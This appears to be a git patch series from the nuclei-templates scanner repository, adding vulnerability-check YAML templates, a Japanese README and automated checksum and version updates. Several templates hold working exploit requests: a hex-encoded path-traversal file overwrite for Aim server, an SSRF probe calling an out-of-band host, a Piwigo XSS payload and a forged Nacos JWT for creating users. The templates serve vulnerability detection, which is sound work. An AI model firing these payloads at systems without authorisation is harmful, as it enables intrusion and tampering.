http/cves/2024/CVE-2024-6396.yaml diff --git a/http/cves/2024/CVE-2024-6396.yaml b/http/cves/2024/CVE-2024-6396.yaml new file mode 100644 index 0000000000..7aa6b0e935 --- /dev/null +++ b/http/cves/2024/CVE-2024-6396.yaml @@ -0,0 +1,68 @@ +id: CVE-2024-6396 + +info: + name: Aimhubio Aim Server 3.19.3 - Arbitrary File Overwrite + author: iamnoooob,rootxharsh,pdresearch + severity: critical + description: | + A vulnerability in the `_backup_run` function in aimhubio/aim version 3.19.3 allows remote attackers to overwrite any file on the host server and exfiltrate arbitrary data. The vulnerability arises due to improper handling of the `run_hash` and `repo.path` parameters, which can be manipulated to create and write to arbitrary file paths. This can lead to denial of service by overwriting critical system files, loss of private data, and potential remote code execution. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-6396 + cwe-id: CWE-29 + metadata: + max-request: 3 + verified: true + fofa-query: icon_hash="-1047157256" + tags: cve,cve2024,aim,aimhubio,file-write + +variables: + filename: "{{rand_base(7)}}" + args: "{{ concat(hex_decode('000000000001000000060a000000fe0000000000000000fe004b000000042e2e2f2e2e2f2e2e2f2e2e2f7573722f6c6f63616c2f6c69622f707974686f6e332e392f736974652d7061636b616765732f61696d5f75692f6275696c642f'),filename, hex_decode('2e747874')) }}" + +http: + - raw: + - | + POST /tracking/client_1/get-resource HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "resource_handler": "my_resource", + "resource_type": "Repo", + "args": "AAAAAAABAAAABw==" + } + + - | + POST /tracking/client_1/read-instruction HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "resource_handler": "my_resource", + "method_name": "_backup_run", + "args": "{{base64(args)}}" + } + + - | + @Host: http://{{Host}}:43800 + GET /static-files/{{filename}}.txt HTTP/1.1 + Host: {{Host}}:43800 + + matchers-condition: and + matchers: + - type: word + part: body_1 + words: + - '{"handler":"my_resource"}' + + - type: word + part: body_3 + words: + - "{{filename}}.txt" + + - type: word + part: header_3 + words: + - "text/plain" From c43559d775f0428b7a16b9dc7658465c4cf5fdc7 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 27 Jul 2024 12:23:48 +0530 Subject: [PATCH 1685/1841] Update CVE-2024-6396.yaml --- http/cves/2024/CVE-2024-6396.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-6396.yaml b/http/cves/2024/CVE-2024-6396.yaml index 7aa6b0e935..34ca5ffad5 100644 --- a/http/cves/2024/CVE-2024-6396.yaml +++ b/http/cves/2024/CVE-2024-6396.yaml @@ -1,7 +1,7 @@ id: CVE-2024-6396 info: - name: Aimhubio Aim Server 3.19.3 - Arbitrary File Overwrite + name: Aimhubio Aim Server 3.19.3 - Arbitrary File Overwrite author: iamnoooob,rootxharsh,pdresearch severity: critical description: | From 0a0e2255067d60dbc0ffec4f4d8a58a92dc28572 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Sat, 27 Jul 2024 15:00:05 +0530 Subject: [PATCH 1686/1841] Create CVE-2024-6922.yaml --- http/cves/2024/CVE-2024-6922.yaml | 43 +++++++++++++++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 http/cves/2024/CVE-2024-6922.yaml diff --git a/http/cves/2024/CVE-2024-6922.yaml b/http/cves/2024/CVE-2024-6922.yaml new file mode 100644 index 0000000000..3be9b942aa --- /dev/null +++ b/http/cves/2024/CVE-2024-6922.yaml @@ -0,0 +1,43 @@ +id: CVE-2024-6922 + +info: + name: Automation Anywhere Automation 360 - Server-Side Request Forgery + author: DhiyaneshDK + severity: high + description: | + Automation Anywhere Automation 360 v21-v32 is vulnerable to Server-Side Request Forgery in a web API component. + impact: An attacker with unauthenticated access to the Automation 360 Control Room HTTPS service (port 443) or HTTP service (port 80) can trigger arbitrary web requests from the server. + reference: + - https://www.automationanywhere.com/products/automation-360 + - https://www.rapid7.com/blog/post/2024/07/26/cve-2024-6922-automation-anywhere-automation-360-server-side-request-forgery/ + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:-1005691603 + fofa-query: icon_hash="-1005691603" + tags: cve,cve2024,ssrf,oast,automation,anywhere + +http: + - raw: + - | + POST /v1/proxy/test HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"saasUrl":"{{interactsh-url}}/?param=one#"} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + + - type: word + part: content_type + words: + - "application/json" + + - type: status + status: + - 400 From 1d60c0c0dc4c70a4b51188285fb07c70244abfd2 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 27 Jul 2024 18:36:37 +0530 Subject: [PATCH 1687/1841] Update CVE-2024-6922.yaml --- http/cves/2024/CVE-2024-6922.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-6922.yaml b/http/cves/2024/CVE-2024-6922.yaml index 3be9b942aa..c8e54f7bcb 100644 --- a/http/cves/2024/CVE-2024-6922.yaml +++ b/http/cves/2024/CVE-2024-6922.yaml @@ -23,7 +23,7 @@ http: POST /v1/proxy/test HTTP/1.1 Host: {{Hostname}} Content-Type: application/json - + {"saasUrl":"{{interactsh-url}}/?param=one#"} matchers-condition: and From f1749c5393bd2641bf6c395d23d11a8639fc60cc Mon Sep 17 00:00:00 2001 From: Ikko Eltociear Ashimine <eltociear@gmail.com> Date: Sat, 27 Jul 2024 23:28:39 +0900 Subject: [PATCH 1688/1841] docs: create README_JA.md --- README_JA.md | 94 ++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 94 insertions(+) create mode 100644 README_JA.md diff --git a/README_JA.md b/README_JA.md new file mode 100644 index 0000000000..b0d5375ef3 --- /dev/null +++ b/README_JA.md @@ -0,0 +1,94 @@ +<h1 align="center"> +Nuclei テンプレート +</h1> +<h4 align="center">アプリケーションのセキュリティ脆弱性を発見するためのNucleiエンジン用テンプレートのコミュニティキュレーションリスト</h4> + +<p align="center"> +<a href="https://github.com/projectdiscovery/nuclei-templates/issues"><img src="https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat"></a> +<a href="https://github.com/projectdiscovery/nuclei-templates/releases"><img src="https://img.shields.io/github/release/projectdiscovery/nuclei-templates"></a> +<a href="https://twitter.com/pdnuclei"><img src="https://img.shields.io/twitter/follow/pdnuclei.svg?logo=twitter"></a> +<a href="https://discord.gg/projectdiscovery"><img src="https://img.shields.io/discord/695645237418131507.svg?logo=discord"></a> +</p> + +<p align="center"> + <a href="https://nuclei.projectdiscovery.io/templating-guide/">ドキュメント</a> • + <a href="#-contributions">貢献</a> • + <a href="#-discussion">ディスカッション</a> • + <a href="#-community">コミュニティ</a> • + <a href="https://nuclei.projectdiscovery.io/faq/templates/">FAQs</a> • + <a href="https://discord.gg/projectdiscovery">Discordに参加</a> +</p> + +<p align="center"> + <a href="https://github.com/projectdiscovery/nuclei-templates/blob/master/README.md">English</a> • + <a href="https://github.com/projectdiscovery/nuclei-templates/blob/master/README_KR.md">한국어</a> • + <a href="https://github.com/projectdiscovery/nuclei-templates/blob/master/README_JP.md">日本語</a> +</p> + +---- + +テンプレートは、実際のスキャンエンジンを動作させる[nucleiスキャナー](https://github.com/projectdiscovery/nuclei)のコアです。 +このリポジトリは、私たちのチームが提供するテンプレートや、コミュニティからの貢献によるさまざまなテンプレートを保存・管理します。 +テンプレートのリストを増やすために、**プルリクエスト**や[Github issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+)を通じて貢献していただけると幸いです。 + +## Nuclei テンプレートの概要 + +Nucleiテンプレートプロジェクトの概要であり、ユニークなタグ、著者、ディレクトリ、重大度、テンプレートの種類に関する統計を含みます。以下の表は、各マトリックスのトップ10の統計を示しています。拡張バージョンは[こちら](TEMPLATES-STATS.md)で確認でき、[JSON](TEMPLATES-STATS.json)形式でも利用可能です。 + +<table> +<tr> +<td> + +## Nuclei テンプレート トップ10統計 + +| タグ | 数 | 著者 | 数 | ディレクトリ | 数 | 重大度 | 数 | 種類 | 数 | +|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| +| cve | 1325 | daffainfo | 629 | cves | 1306 | info | 1398 | http | 3644 | +| panel | 604 | dhiyaneshdk | 509 | exposed-panels | 613 | high | 955 | file | 76 | +| lfi | 490 | pikpikcu | 322 | vulnerabilities | 506 | medium | 784 | network | 50 | +| xss | 451 | pdteam | 269 | technologies | 273 | critical | 445 | dns | 17 | +| wordpress | 409 | geeknik | 187 | exposures | 254 | low | 211 | | | +| exposure | 360 | dwisiswant0 | 169 | token-spray | 230 | unknown | 7 | | | +| cve2021 | 324 | 0x_akoko | 157 | misconfiguration | 210 | | | | | +| rce | 319 | princechaddha | 149 | workflows | 187 | | | | | +| wp-plugin | 304 | pussycat0x | 130 | default-logins | 102 | | | | | +| tech | 286 | gy741 | 126 | file | 76 | | | | | + +**286個のディレクトリ、4012個のファイル**。 + +</td> +</tr> +</table> + +📖 ドキュメント +----- + +新しいテンプレートやカスタムテンプレートを作成するための詳細なドキュメントは、https://nuclei.projectdiscovery.io で確認できます。作業方法を理解するためのテンプレートも用意しています。 + +💪 貢献 +----- + +Nucleiテンプレートはコミュニティの貢献によって動作します。 +[テンプレートの貢献](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+)、[機能リクエスト](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+)、[バグ報告](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+)はいつでも歓迎します。 + +![Alt](https://repobeats.axiom.co/api/embed/55ee65543bb9a0f9c797626c4e66d472a517d17c.svg "Repobeats analytics image") + +💬 ディスカッション +----- + +質問、疑問、アイデアを話し合いたいですか? +[Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions)で自由に始めることができます。 + +👨‍💻 コミュニティ +----- + +プロジェクトの管理者と直接話し合い、セキュリティや自動化に関することを他の人と共有するために、[Discord Community](https://discord.gg/projectdiscovery)に参加することを歓迎します。さらに、Nucleiに関するすべての情報を更新するために、[Twitter](https://twitter.com/pdnuclei)をフォローすることもできます。 + +<p align="center"> +<a href="https://github.com/projectdiscovery/nuclei-templates/graphs/contributors"> + <img src="https://contrib.rocks/image?repo=projectdiscovery/nuclei-templates&max=300"> +</a> +</p> + +皆さんの貢献とコミュニティの活性化への努力に感謝します。 +:heart: From 374b2f78987aae62142685fcf72a92ba2348dd4c Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 28 Jul 2024 00:22:07 +0000 Subject: [PATCH 1689/1841] Auto WordPress Plugins Update [Sun Jul 28 00:22:07 UTC 2024] :robot: --- helpers/wordpress/plugins/elementskit-lite.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/helpers/wordpress/plugins/elementskit-lite.txt b/helpers/wordpress/plugins/elementskit-lite.txt index acf9bf09db..06eda28ac7 100644 --- a/helpers/wordpress/plugins/elementskit-lite.txt +++ b/helpers/wordpress/plugins/elementskit-lite.txt @@ -1 +1 @@ -3.2.2 \ No newline at end of file +3.2.3 \ No newline at end of file From 9b7116c64ed66708bfde3d3e17096f4c0e5076da Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 28 Jul 2024 11:42:29 +0530 Subject: [PATCH 1690/1841] Update CVE-2024-6205.yaml --- http/cves/2024/CVE-2024-6205.yaml | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/http/cves/2024/CVE-2024-6205.yaml b/http/cves/2024/CVE-2024-6205.yaml index b1c16d041a..84a48c33a9 100644 --- a/http/cves/2024/CVE-2024-6205.yaml +++ b/http/cves/2024/CVE-2024-6205.yaml @@ -8,12 +8,14 @@ info: The PayPlus Payment Gateway WordPress plugin before 6.6.9 does not properly sanitise and escape a parameter before using it in a SQL statement via a WooCommerce API route available to unauthenticated users, leading to an SQL injection vulnerability. remediation: Fixed in 6.6.9 reference: - - https://nvd.nist.gov/vuln/detail/CVE-2024-6205 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-6205 - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/payplus-payment-gateway/payplus-payment-gateway-668-unauthenticated-sql-injection - https://wpscan.com/vulnerability/7e2c5032-2917-418c-aee3-092bdb78a087 - - https://www.tenable.com/cve/CVE-2024-6205 + - https://nvd.nist.gov/vuln/detail/CVE-2024-6205 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-6205 + cwe-id: CWE-89 epss-score: 0.00043 epss-percentile: 0.09301 metadata: @@ -22,7 +24,7 @@ info: product: PayPlus Payment Gateway framework: wordpress publicwww-query: "/wp-content/plugins/payplus-payment-gateway" - tags: wpscan,cve,cve2024,sqli,wordpress,wp-plugin + tags: wpscan,cve,cve2024,sqli,wordpress,wp-plugin,wp,payplus-payment http: - raw: @@ -35,6 +37,7 @@ http: - type: dsl dsl: - 'duration>=6' - - 'contains(body,"-1") && contains(content_type,"text/html")' - 'status_code == 302' + - "regex('^-1$', body)" + - 'contains(content_type,"text/html")' condition: and From b040840046f303cd5af30789e9a19befc5df637b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 28 Jul 2024 11:47:58 +0530 Subject: [PATCH 1691/1841] lint fix --- http/cves/2024/CVE-2024-6205.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-6205.yaml b/http/cves/2024/CVE-2024-6205.yaml index 84a48c33a9..15488658e9 100644 --- a/http/cves/2024/CVE-2024-6205.yaml +++ b/http/cves/2024/CVE-2024-6205.yaml @@ -15,7 +15,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-6205 - cwe-id: CWE-89 + cwe-id: CWE-89 epss-score: 0.00043 epss-percentile: 0.09301 metadata: From 92f2c805eeddef759820cb421c2a26a340ece439 Mon Sep 17 00:00:00 2001 From: lanyi <lanyi95@qq.com> Date: Sun, 28 Jul 2024 23:52:19 +0800 Subject: [PATCH 1692/1841] Fix: nacos-create-user.yaml jwt exp time expired --- http/misconfiguration/nacos/nacos-create-user.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/misconfiguration/nacos/nacos-create-user.yaml b/http/misconfiguration/nacos/nacos-create-user.yaml index f5db5ae035..462c2d9bff 100644 --- a/http/misconfiguration/nacos/nacos-create-user.yaml +++ b/http/misconfiguration/nacos/nacos-create-user.yaml @@ -28,7 +28,7 @@ http: payloads: token: - - eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5ODg5NDcyN30.feetKmWoPnMkAebjkNnyuKo6c21_hzTgu0dfNqbdpZQ + - eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OTl9.-isk56R8NfioHVYmpj4oz92nUteNBCN3HRd0-Hfk76g attack: pitchfork matchers-condition: and From ff3f95d8d0b1784d309cb4e46dd20945abb9f79f Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 28 Jul 2024 23:17:44 +0530 Subject: [PATCH 1693/1841] Create CVE-2023-44393.yaml --- http/cves/2023/CVE-2023-44393.yaml | 60 ++++++++++++++++++++++++++++++ 1 file changed, 60 insertions(+) create mode 100644 http/cves/2023/CVE-2023-44393.yaml diff --git a/http/cves/2023/CVE-2023-44393.yaml b/http/cves/2023/CVE-2023-44393.yaml new file mode 100644 index 0000000000..c00e1b1801 --- /dev/null +++ b/http/cves/2023/CVE-2023-44393.yaml @@ -0,0 +1,60 @@ +id: CVE-2023-44393 + +info: + name: Piwigo - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + Piwigo is vulnerable to a reflected XSS in the admin panel where the `plugin_id` parameter is not properly sanitized. + impact: | + Successful exploitation could allow an attacker to execute malicious scripts in the context of the victim's browser. + remediation: | + Update Piwigo to the latest version to mitigate the reflected XSS vulnerability. + reference: + - https://github.com/Piwigo/Piwigo/security/advisories/GHSA-qg85-957m-7vgg + - https://nvd.nist.gov/vuln/detail/CVE-2023-44393 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-44393 + cwe-id: CWE-79 + epss-score: 0.00046 + epss-percentile: 0.15636 + cpe: cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:* + metadata: + vendor: piwigo + product: piwigo + shodan-query: http.favicon.hash:540706145 + fofa-query: title="piwigo" + tags: cve,cve2023,piwigo,xss,authenticated + +http: + - raw: + - | + POST /identification.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}}&login= + + - | + GET /admin.php?page=plugins&tab=new&installstatus=ok&plugin_id=nfez2%22%3E%3Cscript%3Eprompt(document.domain)%3C%2fscript%3Ehkugi HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body_2 + words: + - "<script>prompt(document.domain)</script>" + - "The plugin has been successfully copied" + condition: and + + - type: word + part: header_2 + words: + - "text/html" + + - type: status + status: + - 200 From 7418d9569603056635192607b0b80d8d4b57d6c1 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 29 Jul 2024 00:21:09 +0000 Subject: [PATCH 1694/1841] Auto WordPress Plugins Update [Mon Jul 29 00:21:09 UTC 2024] :robot: --- helpers/wordpress/plugins/wp-statistics.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/helpers/wordpress/plugins/wp-statistics.txt b/helpers/wordpress/plugins/wp-statistics.txt index 94c6217715..cb408008f9 100644 --- a/helpers/wordpress/plugins/wp-statistics.txt +++ b/helpers/wordpress/plugins/wp-statistics.txt @@ -1 +1 @@ -14.9.2 \ No newline at end of file +14.9.3 \ No newline at end of file From 41912793b44464135f8b5aff525724a520c61e6f Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Mon, 29 Jul 2024 03:15:19 +0000 Subject: [PATCH 1695/1841] Auto Generated New Template Addition List [Mon Jul 29 03:15:18 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index cf8da48fe7..4db45e34ba 100644 --- a/.new-additions +++ b/.new-additions @@ -1 +1,2 @@ +http/cves/2023/CVE-2023-44393.yaml http/osint/user-enumeration/substack.yaml From 232a71b785f3b1d36129ec4a2d7deb1af9e9c3fe Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 29 Jul 2024 03:15:27 +0000 Subject: [PATCH 1696/1841] Auto Generated Templates Checksum [Mon Jul 29 03:15:27 UTC 2024] :robot: --- templates-checksum.txt | 47 +++++++++++++++++++++--------------------- 1 file changed, 24 insertions(+), 23 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index c86b130c87..934c68d157 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -223,8 +223,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:932e35a7b832acf213452d63d09965a8f934cefe -cves.json-checksum.txt:b2ffef020db80d91ffe8f5ba3220649514315bff +cves.json:849522c9dc1ee107490581ee14c762b5989fcfb3 +cves.json-checksum.txt:8cd3554ea1c2c29e359a9d9e93f099cc2781c86b dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730 dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -762,7 +762,7 @@ helpers/wordpress/plugins/classic-widgets.txt:98250286db92ccc336dc6f622c10c8bc09 helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt:31918ec11813e2a958c673c0624094b8c07c76a0 helpers/wordpress/plugins/cloudflare.txt:95b4f085ec6b3a33a23781c7cfda78c317e5dca1 helpers/wordpress/plugins/cmb2.txt:6f2af731f80db655385d3795034b4b4bdd02a8bf -helpers/wordpress/plugins/coblocks.txt:0f766def7495524760bb6627fe20754b1b42201b +helpers/wordpress/plugins/coblocks.txt:f6eab21f4096ab86124a60f5d8ae48626e598de9 helpers/wordpress/plugins/code-snippets.txt:bcfacf8cd6cd2afbf752b95fba64c2c67f0c2e7b helpers/wordpress/plugins/coming-soon.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/complianz-gdpr.txt:47c3ed69e5609d2452fff4d1fa775f2f0aaa7d4c @@ -788,7 +788,7 @@ helpers/wordpress/plugins/easy-google-fonts.txt:775bbc46d0bc85e121db86ae12b2993f helpers/wordpress/plugins/easy-table-of-contents.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/easy-wp-smtp.txt:c83b2e9f55420fa41efd48e4a45103566c9e4767 helpers/wordpress/plugins/elementor.txt:46d9b6e7bd05a9cb78d59ae12740fcd1c300f5de -helpers/wordpress/plugins/elementskit-lite.txt:403a4300e5939d1d7fbfb90958aac5b413468ba3 +helpers/wordpress/plugins/elementskit-lite.txt:157d4751f6fc258dd2244da6c46a957ae64e4258 helpers/wordpress/plugins/enable-media-replace.txt:02c0165b5afcee9880bd9f9df6fd96ec80b231d4 helpers/wordpress/plugins/envato-elements.txt:56edf1b708bdabe845695022e07cf4185f4dcad7 helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt:778d773431944dd657af2fde3406d17be92f9cfe @@ -838,7 +838,7 @@ helpers/wordpress/plugins/limit-login-attempts.txt:08d2e98e6754af941484848930ccb helpers/wordpress/plugins/litespeed-cache.txt:03c10c50990743199cc887aaacd3f88a0a0a026e helpers/wordpress/plugins/loco-translate.txt:b8693a006e8d4b4817ba2402c67eff9e73383a45 helpers/wordpress/plugins/loginizer.txt:57f75e869bf26cdb7eaddcd7bb1de6cfbb0594c3 -helpers/wordpress/plugins/loginpress.txt:4ea93c6a1e320054f99d66f428e611b31355cd92 +helpers/wordpress/plugins/loginpress.txt:5f022945150b402cb3e470acc3818847b3dc5e00 helpers/wordpress/plugins/mailchimp-for-woocommerce.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/mailchimp-for-wp.txt:6f8941ad5d1dfeb1e4d4a276b9ad1dbce8a7cc0d helpers/wordpress/plugins/mailpoet.txt:5a69b31dc00045596a99a27b106a7326f6d44297 @@ -925,7 +925,7 @@ helpers/wordpress/plugins/woocommerce-payments.txt:14665694dff2d37ef9323cf70015f helpers/wordpress/plugins/woocommerce-paypal-payments.txt:8833d6b9ff65739ec437d2754b9fc885e202a555 helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:b551dceb18411def5ed66556a7d0855f82ba865f helpers/wordpress/plugins/woocommerce-services.txt:d5191657a84fc8d54327e42ccdc17707f97bfa90 -helpers/wordpress/plugins/woocommerce.txt:4fb032eb953a74896b4877c6950fc07e329c2a70 +helpers/wordpress/plugins/woocommerce.txt:5f0c754f4b89e8b4c936d6e763baf5d8054deca7 helpers/wordpress/plugins/woosidebars.txt:a2048abb201b6201e7cd25e8b0262758a98d59da helpers/wordpress/plugins/wordfence.txt:40c453bafd4ebdb4a4b38416eb90fd03d3073fc3 helpers/wordpress/plugins/wordpress-importer.txt:d195b61caef74dab647d06101869c0863fff7a69 @@ -947,7 +947,7 @@ helpers/wordpress/plugins/wp-rollback.txt:9900ba1358421f36ec71073f65f6a41eed98f7 helpers/wordpress/plugins/wp-seopress.txt:db63fca627057d07dbd8d5064a623a9cd31006f9 helpers/wordpress/plugins/wp-sitemap-page.txt:b600bf3dacb5d620338f6412a343d3349ec570bf helpers/wordpress/plugins/wp-smushit.txt:c7f53e91bcbfae4c21042e9d0833d24ed2cfc08c -helpers/wordpress/plugins/wp-statistics.txt:8547686c44d1287856fe952f839075580fe279ad +helpers/wordpress/plugins/wp-statistics.txt:50a1dda2c7175fa98585515877bea64429587cc8 helpers/wordpress/plugins/wp-super-cache.txt:4cf4800c61a8883b820676f651c058621e0c1b88 helpers/wordpress/plugins/wp-user-avatar.txt:a7bfba4c08f393aabc53a4392dbd6b3d0f13baaa helpers/wordpress/plugins/wpcf7-recaptcha.txt:c3000a6db3b2781a189fbfaa91a73e6d63d567c9 @@ -1578,7 +1578,7 @@ http/cves/2018/CVE-2018-16979.yaml:ac6f5cfd3090ba52cea4db62eb8719cbff2b0558 http/cves/2018/CVE-2018-17153.yaml:5cdbe44c616d3ea36184bee2460031b569d362a0 http/cves/2018/CVE-2018-17246.yaml:fe7a3e41ef31e8f761f3df652a564aae3997bbd6 http/cves/2018/CVE-2018-17254.yaml:63a99c6884bcb88c9d81a6d95136c007f8296cf6 -http/cves/2018/CVE-2018-17422.yaml:6cb4f7c9b64f7ef4e45110285d7a81076550d35b +http/cves/2018/CVE-2018-17422.yaml:a43b8950c4f3c48bc5a202783728e065a65e52b9 http/cves/2018/CVE-2018-17431.yaml:4f724c2ec11d7e5574b913c8f3d171dc69bf23d6 http/cves/2018/CVE-2018-18069.yaml:fb55c1c8a6544261d3da494f50ffe75d12262d5c http/cves/2018/CVE-2018-18264.yaml:22473d7c73a3bf92f029d8f0c97bd438247b7fec @@ -1858,7 +1858,7 @@ http/cves/2020/CVE-2020-12478.yaml:6f8ebabd8a4a0df0eaaf7ebb99dbb706121d2418 http/cves/2020/CVE-2020-12720.yaml:60582b2b99d2498df400db358a628940fc8ced02 http/cves/2020/CVE-2020-12800.yaml:571e8c8b17acd08b60d0b8f28a12c6589caa253c http/cves/2020/CVE-2020-13117.yaml:115011fc3689582aab5176d3b93c0353c5f68a58 -http/cves/2020/CVE-2020-13121.yaml:cf9bf86ed2ce0b6145b88f46c989b2548dca569e +http/cves/2020/CVE-2020-13121.yaml:8e5a6e4aae3e31b86c2dbff584b94abc4e0337a6 http/cves/2020/CVE-2020-13158.yaml:e519e5f44d47a168e7e54bd2a643040f87a12587 http/cves/2020/CVE-2020-13167.yaml:ec08b3533526649fedf57311f268a9ffe02111c0 http/cves/2020/CVE-2020-13258.yaml:4c4cb4659c8f357321d694522d65826a3acf4bd1 @@ -2586,7 +2586,7 @@ http/cves/2022/CVE-2022-0788.yaml:5d60f92d349f7fecefec325a40f08d6970a98a99 http/cves/2022/CVE-2022-0814.yaml:b9d91c9b6d0d5785a892ae9e0b8ca7ebbb0f2dbf http/cves/2022/CVE-2022-0817.yaml:3d97d0fc13055df8d7452acbf7103cbed7eb24cc http/cves/2022/CVE-2022-0824.yaml:0c81c3a3ec7279bb619a1e0ddc46dd2fe2463ad7 -http/cves/2022/CVE-2022-0826.yaml:62452246f330773b5332e97e94f8bacfcdaf7f17 +http/cves/2022/CVE-2022-0826.yaml:932c997f120a08b809ae12ee795ce06e81b21e5c http/cves/2022/CVE-2022-0827.yaml:0004c15fb0ac347037597f5d71d7800cf097e84a http/cves/2022/CVE-2022-0846.yaml:19baadca475a5807aaafef134a6e7399ab75ec51 http/cves/2022/CVE-2022-0864.yaml:f2dfdb584ab501f690ba9ef1aee6ecc88f0ae7f7 @@ -2615,7 +2615,7 @@ http/cves/2022/CVE-2022-1168.yaml:93e0ac42cd3ee8391d615a78f9eac80ae749aa8f http/cves/2022/CVE-2022-1170.yaml:fc73692aa6bf3c88cfac42e379be21e45c14b392 http/cves/2022/CVE-2022-1221.yaml:d4c46be1641ebeef015e219a3d6bfd4ab55ce8f0 http/cves/2022/CVE-2022-1329.yaml:91ffe6a2f0b02dff11a43ae18576f2744a9d0fb1 -http/cves/2022/CVE-2022-1386.yaml:49d6d50af97dddeb644e0d44c4fd786068b0b863 +http/cves/2022/CVE-2022-1386.yaml:32ffe197b5acc58d14c47f334e7486d1bb0dacbd http/cves/2022/CVE-2022-1388.yaml:ec9ff508d8aa2af48234933c0ec747582268ac04 http/cves/2022/CVE-2022-1390.yaml:cdda5e7620a740024ec05c775b94861e6885853a http/cves/2022/CVE-2022-1391.yaml:d8fe08b47cb867425b80fa614e64f8b211ff609e @@ -2767,7 +2767,7 @@ http/cves/2022/CVE-2022-29009.yaml:5b59e01a1574bdcf05aee421722002bfeedc1eaf http/cves/2022/CVE-2022-29013.yaml:aa822f0d3d9c552b38ee8e0d6f24416d6fc52cca http/cves/2022/CVE-2022-29014.yaml:d7fe9eba13214850635cedd9df08b509ed93f30c http/cves/2022/CVE-2022-29078.yaml:0d9401a7ca4b569db1fa80884acc0201e4534493 -http/cves/2022/CVE-2022-29153.yaml:37c7c4cf25e53acad5036c798b11df54752b8a75 +http/cves/2022/CVE-2022-29153.yaml:403f43c5ed94d6f109b2aca8a4e7ded212276190 